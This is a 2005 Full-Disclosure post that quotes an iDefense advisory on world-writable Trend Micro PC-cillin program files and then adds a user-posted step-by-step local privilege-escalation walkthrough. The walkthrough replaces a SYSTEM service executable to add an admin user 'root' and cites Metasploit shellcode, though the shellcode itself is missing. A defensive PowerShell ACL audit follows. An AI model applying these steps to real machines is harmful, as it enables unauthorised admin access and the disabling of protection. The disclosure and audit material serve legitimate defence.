[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability
gerhard.wagner at fh-hagenberg.at
Tue Dec 27 11:04:35 GMT 2005
labs-no-reply at idefense.com wrote:
> Trend Micro PC-Cillin Internet Security Insecure File Permission
> iDefense Security Advisory 12.14.05
> December 14, 2005
> I. BACKGROUND
> Trend Micro PC-Cillin Internet Security is antivirus protection software
> for home and business use. It provides complete protection, detection
> and elimination of thousands of computer viruses, worms, and Trojan
> Horse programs.
> II. DESCRIPTION
> Local exploitation of an insecure permission vulnerability in multiple
> Trend Micro Inc. products allows attackers to escalate privileges or
> disable protection.
> The vulnerabilities specifically exist in the default Access Control
> List (ACL) settings that are applied during installation. When an
> administrator installs an affected Trend Micro product, the default ACL
> allows any user to modify the installed files. Due to the fact that some
> of the programs run as system services, a user could replace an
> installed Trend Micro product file with their own malicious code, and
> the code would be executed with system privileges.
> III. ANALYSIS
> Successful exploitation allows local attackers to escalate privileges to
> the system level. It is also possible to use this vulnerability to
> simply disable protection by moving all of the executable files so that
> they cannot start upon a reboot. Once disabled, the products are no
> longer able to provide threat mitigation, thus opening the machine up to
> IV. DETECTION
> iDefense has confirmed the existence of this vulnerability in Trend
> Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is
> suspected that previous versions are also vulnerable. It has been
> reported that InterScan VirusWall, InterScan eManager and Office Scan
> are also vulnerable.
> V. WORKAROUND
> Apply proper Access Control List settings to the directory that the
> affected Trend Micro product is installed in. The ACL rules should be set
> so that no regular users can modify files in the directory.
> VI. VENDOR RESPONSE
> "Trend Micro has become aware of a vulnerability related to PC-CILLIN
> 12. PC-cillin12 does not work correctly when configuration file and the
> registry are erased intentionally.
> We will release PC-cillin12.4 on December 14, 2005 via the AU server. This
> release will include a short-term solution of changing the ACL to User
> authority for the configuration file and registry.
> We will create a tool for changing ACL to User authority for
> configuration file and registry.
> This tool can be used for both PC-cillin12 and PC-cillin14 as a same
> VII. CVE INFORMATION
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2005-3360 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org), which standardizes names for
> security problems.
> VIII. DISCLOSURE TIMELINE
> 10/27/2005 Initial vendor notification
> 10/27/2005 Initial vendor response
> 12/14/2005 Public disclosure
> IX. CREDIT
> The discoverer of this vulnerability wishes to remain anonymous.
> Get paid for vulnerability research
> X. LEGAL NOTICES
> Copyright © 2005 iDefense, Inc.
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without the express
> written consent of iDefense. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically, please
> email customerservice at iDefense.com for permission.
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
by Team W00dp3ck3r:
frauk\x41iser, mag00n and s00n
Advisory: www.idefense.com/application/poi/display?id=351&type=vulnerabilities
Tested on Windows XP Service Pack 2 English
Version affected: PC-cillin Internet Security 2006
Status: currently no patch has been provided (19.12.2005)

Follow the instructions to gain administrative privileges:

1.) Default installation (can only be accomplished as Administrator).
2.) Log in as a restricted user.
3.) Compile the C code provided at the bottom of this document.
4.) Right click on the Trend Micro icon in the taskbar and shut down Trend Micro
    (it seems that Trend has forgotten that normal users should not be able to
    shut down an antivirus service).
5.) Fire up your favorite editor (we recommend UltraEdit), open the previously
    compiled exe, and also open TmPfw.exe, which is located in the default
    installation directory of your Trend Micro installation.
6.) First copy the content of TmPfw.exe into a blank document and save it.
    We will need it later, when we want to repair the service.
7.) Now replace the content of the TmPfw.exe file with the content of the
    self-compiled executable.
    Note: It is really important to alter the content of the TmPfw.exe file. If
    you just change the filename of the created executable and then replace the
    file, the initial rights which are set during the installation would be lost.
    The TmPfw.exe file is executed with SYSTEM rights during the startup process
    of Windows and it's under our control, because Trend Micro really messed up
    the permissions.
8.) Restart pccmain.exe and if you type net user in your command shell you will
    notice a user with administrative rights called root.
9.) Finally open the editor again and restore the content of TmPfw.exe. Now
    Trend Micro works again without complaining.
/* win32_adduser - PASS=root EXITFUNC=thread USER=root Size=232
* Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode =
Full-Disclosure is hosted and sponsored by Secunia.
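Section V of the quoted advisory asks for install-directory ACLs that no regular user can modify; the PowerShell audit below is an added example, not code from the advisory or from the W00dp3ck3r post. It lists every ACE under a directory that grants Everyone, Users, Authenticated Users or INTERACTIVE write, modify, delete or full control; the default path is a placeholder, and the icacls command in the trailing comment is the remediation a defender would apply on Windows Vista and later (Administrators and SYSTEM full control, Users read and execute only).

```powershell
# Added example (not from the advisory or the post): find ACEs that let regular
# users modify files, the condition in section II. Default path is a placeholder.
param(
    [string]$Path = "C:\Program Files\Trend Micro\Internet Security"  # placeholder
)
# Identities that stand for "any regular user" on a Windows machine.
$LowPrivIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights lets a user overwrite, replace or remove a program file.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-WeakAce {
    param([string]$Target)
    $acl = Get-Acl -LiteralPath $Target -ErrorAction SilentlyContinue
    if (-not $acl) { return }   # unreadable ACL: skip rather than abort the audit
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -ne 0) {
            [pscustomobject]@{
                Path      = $Target
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # inherited ACEs point at a parent-level fix
            }
        }
    }
}

# Check the directory itself plus everything below it (services load DLLs too).
$targets = @($Path) + @(Get-ChildItem -LiteralPath $Path -Recurse -Force |
                        Select-Object -ExpandProperty FullName)
$findings = @($targets | ForEach-Object { Get-WeakAce -Target $_ })

if ($findings.Count -eq 0) {
    "No modify rights for regular users under $Path"
} else {
    $findings | Format-Table -AutoSize
    # Remediation matching the advisory's workaround (icacls, Windows Vista and later):
    # icacls "$Path" /inheritance:r /t /grant:r "BUILTIN\Administrators:(OI)(CI)F" `
    #     "NT AUTHORITY\SYSTEM:(OI)(CI)F" "BUILTIN\Users:(OI)(CI)RX"
}
```

Inherited findings mean the weak ACE lives on a parent directory, so the fix belongs there rather than on each file.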